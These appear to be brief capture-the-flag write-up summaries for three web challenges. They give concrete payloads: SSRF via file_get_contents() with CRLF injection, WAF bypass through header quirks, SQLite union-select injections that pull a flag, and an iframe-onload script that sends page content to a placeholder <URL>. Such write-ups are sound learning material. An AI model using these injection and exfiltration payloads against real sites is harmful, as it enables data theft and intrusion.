tl;dr

• SSRF using file_get_contents() and CRLF in ini_set()
• basic Header quirks to bypass waf
• sqli using column trick in SQLite to get the flag

tl;dr

• Make a GET request to /gettoken%3fcreditcard=mmm&promocode=FREEWAF to get the token.
• Using the token make another request with {"name":"' union select flag, 1, 1, 1 from flag -- -", "name":"x"} to get the flag.

tl;dr

• SQLi - lcase('inKypinKy')id from dual
• Creating User - header("location:http://web/user.php?session=1111-22222-1234&sub=submit");
• Retrieving Flag - header("location:http://web/flag.php?session=<iframe id="a" src="http://web/flag.php?session=1111-22222-1234&sub=submit" onload=window.location="<URL>?"+btoa(document.getElementById('a').contentWindow.document.body.innerText)>&sub=submit")